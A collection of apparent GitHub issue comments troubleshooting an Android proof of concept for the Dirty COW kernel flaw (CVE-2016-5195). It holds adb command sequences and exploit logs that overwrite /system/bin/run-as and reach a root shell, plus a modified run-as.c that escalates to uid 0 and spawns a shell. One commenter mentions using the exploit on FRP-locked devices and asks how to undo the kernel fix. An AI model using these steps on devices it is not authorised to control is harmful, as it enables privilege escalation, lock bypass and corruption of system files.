My device hardreboots as soon as the exploit finishes, leading to the following output: Any suggestions?

[bithakr@localhost CVE-2016-5195]$ make run
make: *** No rule to make target 'run'.  Stop.
[bithakr@localhost CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/bithakr/dev/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/bithakr/dev/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13776) and file old size (9444) differ

size 13776


[*] mmap 0xb6f2c000
[*] exploit (patch)
[*] currently 0xb6f2c000=464c457f
[*] madvise = 0xb6f2c000 13776
[*] madvise = 0 1048576
adb shell /system/bin/run-as
error: no devices/emulators found
make: *** [Makefile:14: root] Error 1

Hi guys! Is it possible to make POC with Android Studio project to build APK?
If any will start or has link share pls!

Hello, I've tried to exploit the root access with dirtycow and i've modified the file run-as.c for launching a system command with the function system() but it don't work. Here is the code :

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/capability.h>

int main(int argc, char **argv)
{
  struct __user_cap_header_struct capheader;
  struct __user_cap_data_struct capdata[2];

  memset(&capheader, 0, sizeof(capheader));
  memset(&capdata, 0, sizeof(capdata));
  capheader.version = _LINUX_CAPABILITY_VERSION_3;
  capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
  capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
  if (capset(&capheader, &capdata[0]) < 0) {
    printf("Could not set capabilities: %s\n", strerror(errno));
  }

  if(setresgid(0,0,0) || setresuid(0,0,0)) {
    printf("setresgid/setresuid failed\n");
  }

  if(getuid() != 0){
    printf("Failed to obtain root access. \n");
    exit(1);
  }
  printf("SUCESSFULL!!\n");
  system("/system/bin/id");
  system("/system/bin/sh");
  return 0;
}

Here is the output:

shell@HWLYO-L6735:/data/local/tmp $ run-as
WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x53c
WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1
SUCESSFULL!!

Do you have an idea ? Thank you in advance for your answer.

Is there anyway to use this exploit WITHOUT patching any system files?

Anytime i try to run something with run-as i get error permission denied. My phone is an HTC desire 530 from verizon with the bootloader still locked (fuck verizon).

root@kali:~/CVE-2016-5195# make
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make: ndk-build: Команда не найдена*Comand not found*
Makefile:5: ошибка выполнения рецепта для цели*Error with starting reciept for target* «build»
make: *** [build] Ошибка*Error* 127

(sorry my english)))

Code generating info:

	int f=open(argv[1],O_RDONLY);
	if (f == -1) {
		LOGV("could not open %s", argv[1]);
		return 0;
	}
	if (fstat(f,&st) == -1) {
		LOGV("could not open %s", argv[1]);
		return 0;
	}

Do You know what can be the reason ?

shell@m0:/system/bin $ ls -l run-as
-rwxr-x--- root     shell        9432 2014-01-25 09:03 run-as

Samsung Galaxy S3

I have read [ https://forum.xda-developers.com/showpost.php?p=70311089&postcount=44 ] one xda-user used dirtycow to modify file /system/etc/fonts.xml and modifications was there after boot. His phone is "Moto G 2014 with stock Marshmallow"

I encountered this with Samsung Xcover 3 (gf388). I don't know how to reproduce it, but now I have /system/bin/wpa_supplicant permanently* broken with random data (I was just testing dirtycow and wpa_supplicant was ~biggest binary there). I haven't yet got root shell and /system-partition has been always mounted read only.

[EDIT]
Android 4.3
Linux version 3.0.31-2429075 (dpi@DELL135) (gcc version 4.4.3 (GCC) ) #1 SMP PREEMPT Wed Apr 30 18:49:01 KST 2014
[ro.build.date]: [Wed Apr 30 18:55:06 KST 2014]
[ro.build.description]: [m0xx-user 4.3 JSS15J I9300XXUGND5 release-keys]
[ro.build.fingerprint]: [samsung/m0xx/m0:4.3/JSS15J/I9300XXUGND5:user/release-keys]
[ro.build.version.release]: [4.3]

*) until reflash

So beware: Dirtycow will eat your children!

$ make run
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
[1] Segmentation fault /data/local/tmp/...
adb shell /system/bin/run-as
Usage: run-as <package-name> <command> [<args>]

Device is a ZTE Racer II with Android 2.2.2. Wikipedia link: https://en.wikipedia.org/wiki/ZTE_Racer_II

I can think that the shell is a problem as it's extremely bad (arrow-up doesn't work and everything else is also bad)

Running the command in a shell manually:

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
[1] + Stopped (signal) /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
$ # i pressed enter here
[1] Segmentation fault /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as

dirtycow always says it works for me and quickly but it has only worked once. I am passionately trying to rediscover how I did it. (I patched /system/build.prop and it showed in recovery!)

2 Possibilities of how:
First Possibility:
I just got done flashing the wrong files in Download Mode repeatedly getting fails. I tried rooting files that almost finished, rooting files for 5.11 that did finish but didn't boot. Finally I put just the AP file back (excluding BL+CP+CSC files) and it booted, then I executed.. (did i crash the November 1 2016 update, or get at the kernel somehow on a locked bootloader?)

Second Possibility:
I accidentally delete the directory containing the version I used. Maybe I found a version for Samsung or compiled it differently?? (I was trying tons of dirtycow compilations)
CVE-2016-5195 = SVE-2016-7504 (double patched?)
Google says the fix is called CVE-2016-5195 patched 11-05-2016, however my security patch level is Nov 1st, 2016. The Samsung SVE-2016-7504 is stated to be included in November's patches and there are 14 patches in that set. AT&T N920AUCS4CPK1 has a note about 14 patches from Samsung, the exact number. (so I seem to be patched if I follow the logic even though Google responded on 11/05/2016 but I dunno how to confirm what's in this Nov 1 2016 security patch in the PK1 firmware.)

Samsung Note 5 7420Exynos, here's what I'm building with.

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23

***Android.mk***
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_SRC_FILES := \
  dirtycow.c
LOCAL_MODULE := dirtycow
LOCAL_LDFLAGS   += -llog
LOCAL_CFLAGS    += -DDEBUG

(I try these flags also, separately.. I am learning C on Android, I like it.)

LOCAL_CFLAGS    += -fPIE
LOCAL_LDFLAGS   += -fPIE -pie

include $(BUILD_EXECUTABLE)

./run-as.c:3:10: fatal error: 'sys/capability.h' file not found

include <sys/capability.h>

     ^

1 error generated.

I've so far tested the PoC on two devices:

Sony Xperia Z2 Tablet (rooted, running Cyanogenmod [11 i think]) - Android 4.4.4 :
Status: Worked perfectly - overwritten run-as and was able to spawn root shell, meaning no SELinux was present.

[*] mmap 0xb6ee0000
[*] exploit (patch)
[*] currently 0xb6ee0000=464c457f
[*] madvise = 0xb6ee0000 9680
[*] madvise = 0 1048576
[*] /proc/self/mem 1560281088 1048576
[*] exploited 0xb6ee0000=464c457f

Sony Xperia Z5 Compact (stock firmware, non-rooted) - Android 6.0.1 :
Status: Not working - run-as was not overwritten. Tried to increase the LOOP define from 0x100000 to 0x10000000 as I thought maybe it needs more time to trigger the run condition, but still after several minutes there was no success and run-as remained unchanged.

[*] mmap 0xf6fcd000
[*] exploit (patch)
[*] currently 0xf6fcd000=464c457f
[*] madvise = 0xf6fcd000 14192
[*] madvise = 0 268435456
[*] /proc/self/mem -268435456 268435456
[*] exploited 0xf6fcd000=464c457f

Will later check also on Samsung S5 and post the results here. Let me know if you need me to give you any more info.

^

i am using termux which have gcc provided by installing

I've tried execpl, system, even executing chmod(const char *pathname, mode_t mode) in the code but nothing seems to work.

I do get getuid() == 0, but I can't do anything with that privilege.

EDIT: My device does NOT have /system/bin/run-as with setuid and I have seen NO device that has it set.

I couldn't figure out what I was doing wrong, then I realized that the exploit will trim the source's file size to the destination's current file size. So, if the source is 30 bytes, but the destination is 20 bytes, then only the first 20 bytes of the source will get copied.

IMO it's worth adding this to the README somewhere.

adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x5f8
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13708) and file old size (9440) differ

size 13708

[] mmap 0xb63fc000
[] exploit (patch)
[] currently 0xb63fc000=464c457f
[] madvise = 0xb63fc000 13708
[] madvise = 0 1048576
[] /proc/self/mem 0 1048576
[*] exploited 0xb63fc000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x4fc
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

So after compiling dirtycow and running it on an Galaxy J5 on 5.1.1 Lollipop (SEAndroid Enforced) http://imgur.com/a/9PRAl , it wont do anything rather it would tell me that it is running as uid 200 and uid 0, thats all. I searched a lot about this issue but was not able to get any detailed information about this issue. My first thought on why its not working was about SEAndroid being enforced, after asking JCase on Twitter, he said that the issue cant be SEAndroid. As to dirtycow itself, it seems to exploit succesfully since run-as binary in /system/bin has changed. I have to mention that my main goal is to spawn a root shell, but yet I cant even run a single command as root. Really appreciate dirtyclow, glad if someone can help me out

Firstly, nice work.

Second - when compiling, run-as fails for armeabi-v7a due to not having xattr. I understand this is a libattr file, but after install the normal and dev packages I still get the error.

Does anybody know the correct package for a copy of xattr.h? I tried a few online without success.

System: Linux Mint x64

I'm trying to dirtycow to /sys/fs/selinux/enforce to disable SELinux, but since the filesystem describes it as having a size of 0 bytes, it fails with this log (even though it's entirely readable and has a size of 1 byte)

$ ./dirtycow /sys/fs/selinux/enforce ./enforce
warning: new file size (1) and file old size (0) differ

size 1


mmap

Or will it never work like that?

Issue:
After successfully exploiting, I am taken to the shell but if I press enter (doesn't matter what the command is), it kind of hangs. You could press the enter key as much as you want and it would go to the next line each time but it looks (visually) as if it's still waiting for output infinitely with the blinking cursor. Using CTRL+C is one way of getting out of the entire thing. I had tested the reboot command but that did nothing whatsoever.
The actual unit was responsive the entire time. So nothing like kernel panics ended up happening (unlike half of the time with KingRoot).

System information:

Model: 40PUT6400/12 - Philips - Developed by TP Vision
Product ID: QM152E
Security Patch Date: 2016-07-01
Android Version: 5.1.1 (22 SDK)
CPU: Cortex-A17 (armeabi-v7a, 32 bit)
Kernel Version: 3.10.27 (build_ci@inblrlx047) (gcc version 4.8.2 20131014 (prerelease) (Linaro GCC 4.8-2013.10)) #1 SMP PREEMPT Fri Oct 7 11:45:11 IST 2016

MAKE TEST:

user@hostname:~/Desktop/CVE-2016-5195-master$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
100 KB/s (13784 bytes in 0.134s)
adb push test.sh /data/local/tmp/test.sh
11 KB/s (367 bytes in 0.031s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2016-12-30 19:22 test
-rwxrwxrwx shell    shell         367 2016-12-19 14:06 test.sh
-r--r--r-- shell    shell          18 2016-12-30 19:22 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0xb6eda000
[*] currently 0xb6eda000=72756f79
[*] madvise = 0xb6eda000 18
[*] madvise = 0 59449
[*] /proc/self/mem 93150 5175
[*] exploited 0xb6eda000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

MAKE ROOT:

user@hostname:~/Desktop/CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
111 KB/s (13784 bytes in 0.121s)
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
54 KB/s (5544 bytes in 0.100s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9444) differ

[*] size 5544
[*] mmap 0xb6e7d000
[*] currently 0xb6e7d000=464c457f
[*] madvise = 0xb6e7d000 5544
[*] madvise = 0 460
[*] /proc/self/mem 205128 37
[*] exploited 0xb6e7d000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x63c
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@philips_MT5593FHT_EU:/ #

Hello,

For big files, I realized that I can't replace more than 0xFFF bytes of the original file content.
Any ideas?

Thanks

I have Samsung phone with Android 6.0.1, and it still have Knox warranty, and my goal is to keep KNOX.

I just checked that dirtycow will work on my phone.
I also found that there are couple of
/system/bin/fsck.* with read permission. I'm pretty sure they are executed as root and seems I'm able to trigger them at a will (sd-card or usb-otg). And they are pretty big. Perfect targets then.

BUT my question: What to do next? For my model there are twrp available. So could I do:
dd if=twrp.img of=/dev/block/platform/by-name/RECOVERY

What KNOX will say about that? Then I could boot to twrp and install superSu.zip, and what KNOX will say about that?

My phone has (developer-) option for allowing/disallowing flashing. I think flashing must be enabled. Not because of dd, but for booting with non-samsung recovery-image.

(I think that after using dirtycow I cant just install superSu.apk because of dirty cache so hence changing recovery).

"CVE-2016-5915 (dirtycow/dirtyc0w) proof of concept for Android"

Should be 2016-5195 as the project is named.

Hey guys, looking for a bit of direction for getting this exploit working on my device. It's a Samsung Galaxy E 7" Lite, running at android SDK 19 (based on adb shell getprop ro.build.version.sdk).

I've attempted to build for APP_PLATFORM=android-19 and couldn't compile due to missing sys/capabilities.h headers. I've also attempted to increase the loop size without success.

I've pasted the output from my initial trial below. Interested in messing around with the code but need some direction as to what is potentially going wrong with the exploit.

Thanks!

→ make root
../ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory `~/Desktop/android_root/CVE-2016-5195'
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb  : run-as <= run-as.c
[armeabi] Executable     : run-as
[armeabi] Install        : run-as => libs/armeabi/run-as
make[1]: Leaving directory `~/Desktop/android_root/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
1981 KB/s (13516 bytes in 0.006s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
1157 KB/s (9420 bytes in 0.007s)
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (9420) and file old size (9440) differ

size 9440


[*] mmap 0xb6ef6000
[*] exploit (patch)
[*] currently 0xb6ef6000=464c457f
[*] madvise = 0xb6ef6000 9440
[*] madvise = 0 1048576
[*] /proc/self/mem 1308622848 1048576
[*] exploited 0xb6ef6000=464c457f
adb shell /system/bin/run-as
running as uid 2000
setresgid/setresuid failed
uid 2000

Let me just start by saying I really don't understand the extent of what my question really entails. As much as I'd like to fully understand the inner workings of this exploit I really just haven't been able to grasp it just yet. So just go easy in your potential response...

I've found many interesting ways to use the exploits you all have put together, specifically this one the most. I have a few videos showing how to use this on FRP locked devices on youtube that are worth a watch.

I found the page that discusses how this exploit has been patched in the more recent updates https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619.

I'm wondering what the possibilities are for being able to "un-patch" the fixes that break dirtycow's functionality. I realize this is probably a very broad question to be asking but just from looking at the source for the patched updates it really doesn't look like very much was altered. Future thanks to anyone that can add some info on the topic.

Samsung Galaxy S2, running kernel 3.0.31 and Android-4.1.2.
Dirtycow not triggering.

Running dirtycow gives
[*] exploited 0x402d1000=464c457f
but targeted file is not changing.

I have tried couple of things:
Different toolchain: android-ndk-r12b / android-ndk-r13b
Different platform: APP_PLATFORM=android-21 / APP_PLATFORM=android-10
Different loop: #define LOOP 0x100000 / 0x10000 / 0x1000000
Different pagesize: #define PAGE_SIZE 4096 / 2048

What can be the issue? What else I can do?

Full log:

shell@android:/data/local/tmp $ ./busybox md5sum /default.prop default.prop    
28bc55d4056c4e75e38bc570c579b6a0  /default.prop
e3e8cce6dc9070cfb3fc3e5403fe40f4  default.prop
shell@android:/data/local/tmp $ ./dirtycow /default.prop default.prop          
warning: new file size (6450) and file old size (116) differ

size 6450


[*] mmap 0x400e7000
[*] exploit (patch)
[*] currently 0x400e7000=20230a23
[*] madvise = 0x400e7000 6450
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x400e7000=20230a23
shell@android:/data/local/tmp $ ./busybox md5sum /default.prop                 
28bc55d4056c4e75e38bc570c579b6a0  /default.prop

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell "/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as"
warning: new file size (13776) and file old size (17920) differ

size 17920

[] mmap 0xb6d3b000
[] exploit (patch)
[] currently 0xb6d3b000=464c457f
[] madvise = 0xb6d3b000 17920
[] madvise = 0 1048576
[] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell
shell@R1_HD:/ $ run-as
running as uid 2000
uid 0
shell@R1_HD:/ $ run-as id
running as uid 2000
uid 0
shell@R1_HD:/ $ exit

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as id
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls /dev
running as uid 2000
uid 0

Hello, I've successfully spawn a root shell but i can't run any root commands. Here is an example:

root@HWLYO-L6735:/ # id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
root@HWLYO-L6735:/ # mount -o remount,rw /system 
mount: Permission denied
255|root@HWLYO-L6735:/ # 

Can you help me?

In the example, you're feeding in bytes, but the actual PoC here uses a file.

I wanted to root my phone (android 5.1.1) and install supersu but kingroot,kingroot and etc. didn't work . How can I root my phone using this? I must have machinę with Linux or Windows to do so?

my run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

I think dirtycow successed, but /system/bin/run-as doesn't have setuid access right, so run-as failed set capabilities.

No matter what package I use, whether existent or not, always prints the above error message. I've tried run-as id, run-as ls -1Z /sbin/, run-as run-as, run-as dfbkdfvksfdigertgf, and more. All the same error message.

run-as: Package 'id' is unknown
run-as: Package 'ls' is unknown
run-as: Package 'run-as' is unknown
run-as: Package 'dfbkdfvksfdigertgf' is unknown

etc. I'd love if someone could help. Thanks!

i tried compiling with all ways using the other issue, but every compiled binary gives me segmentation fault, i'm trying to use it on my android 3.2.1 (api13) tablet that never got root, can anyone say me what to do?

hi.. has long I'm trying to figure out how to run this exploit but as soon as I make run tells me:
No rules to generate the "run" target. Arrest.

then after I tried to do only make me and says:
ndk-build NDK_PROJECT_PATH =. APP_BUILD_SCRIPT =. / Android.mk APP_PLATFORM = android-21
make: ndk-build: command not found
makefile: 5: instruction set for the "build" target fails
make: *** [build] Error 127

am I something wrong?

Hi , i tried many times but no luck . i have to say exploit works on regular files but when i try to replace run-as , device reboots .

Hi i try to execute the make root command and i get the following output:

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 make[1]: Entering directory /home/matant/Downloads/tmp/CVE-2016-5195'
[armeabi] Compile thumb : dirtycow <= dirtycow.c
[armeabi] Compile thumb : dirtycow <= dcow.c
[armeabi] Executable : dirtycow
[armeabi] Install : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb : run-as <= dirtycow.c
[armeabi] Compile thumb : run-as <= run-as.c
[armeabi] Executable : run-as
[armeabi] Install : run-as => libs/armeabi/run-as
make[1]: Leaving directory `/home/matant/Downloads/tmp/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dcow
191 KB/s (13516 bytes in 0.069s)
adb push libs/armeabi/run-as /data/local/tmp/run-as
93 KB/s (5276 bytes in 0.055s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5276) and destination file size (14360) differ

[] size 5276
[] mmap 0xe8960000
[] currently 0xe8960000=464c457f
[] madvise = 0xe8960000 5276
[] madvise = 0 1048576
[] /proc/self/mem -269922 269922
[*] exploited 0xe8960000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
run-as [--user ] []
`

It seems only strictly control the root authority, other users normal authority. I have constructed a su executable file into the local directory, execute the run-as and then use the su to enhance the permissions for the system, there are actually all the permissions system. With system authority can further enhance the authority?

angler:/data/local/tmp $ ./dirtycow
"./dirtycow": error: only position independent executables (PIE) are supported.
Aborted

Mips based smartwatch, probably Android 5.1, no SELINUX.

` make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Verzeichnis „/home/michael/Technisches/CVE-2016-5195“ wird betreten
[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as
[x86_64] Install : dirtycow => libs/x86_64/dirtycow
[x86_64] Install : run-as => libs/x86_64/run-as
[mips64] Install : dirtycow => libs/mips64/dirtycow
[mips64] Install : run-as => libs/mips64/run-as
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
[armeabi] Install : dirtycow => libs/armeabi/dirtycow
[armeabi] Install : run-as => libs/armeabi/run-as
[x86] Install : dirtycow => libs/x86/dirtycow
[x86] Install : run-as => libs/x86/run-as
[mips] Install : dirtycow => libs/mips/dirtycow
[mips] Install : run-as => libs/mips/run-as
make[1]: Verzeichnis „/home/michael/Technisches/CVE-2016-5195“ wird verlassen
adb push libs/mips/dirtycow /data/local/tmp/dcow
3025 KB/s (71272 bytes in 0.023s)
adb push libs/mips/run-as /data/local/tmp/run-as
4716 KB/s (71348 bytes in 0.014s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x7ec
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (71348) and destination file size (70948) differ

corruption?

[] size 71348
[] mmap 0x779af000
[] currently 0x779af000=464c457f
[] madvise = 0x779af000 71348
[] /proc/self/mem 65069376 912
[] madvise = 0 160505
[*] exploited 0x779af000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xdf000e0a arg 0xd5d6d7de
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xd1d2d3d4 arg 0xbd0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
WARNING: linker: /system/bin/run-as: unused DT entry: type 0xffffffff arg 0x0
CANNOT LINK EXECUTABLE DEPENDENCIES: library "�" not found
`
Any idea?

I notice that the forked process is SIGSTOP-ed. Is there any way to make the process exit after the exploit?

Sup!

I was testing the exploit with a LG G5 and a G4 and the shell was hanging but I wasn't getting any SELinux errors with adb logcat | grep avc so I was trying some things and found out that if you change the Makefile from

•   adb shell /system/bin/run-as
  

to

•   adb shell
  

and call manually /system/bin/run-as, you get root.

demo:

~/S/CVE-2016-5195> make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/svieg/Shared/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/svieg/Shared/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
198 KB/s (10056 bytes in 0.049s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
220 KB/s (10056 bytes in 0.044s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (10056) and destination file size (14192) differ

[*] size 10056
[*] mmap 0x7fa684e000
[*] currently 0x7fa684e000=10102464c457f
[*] madvise = 0x7fa684e000 10056
[*] madvise = 0 31
[*] /proc/self/mem 30168 3
[*] exploited 0x7fa684e000=10102464c457f
adb shell
shell@h1:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@h1:/ $ /system/bin/run                                                   
run-as runcon 
shell@h1:/ $ /system/bin/run-as                                                
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
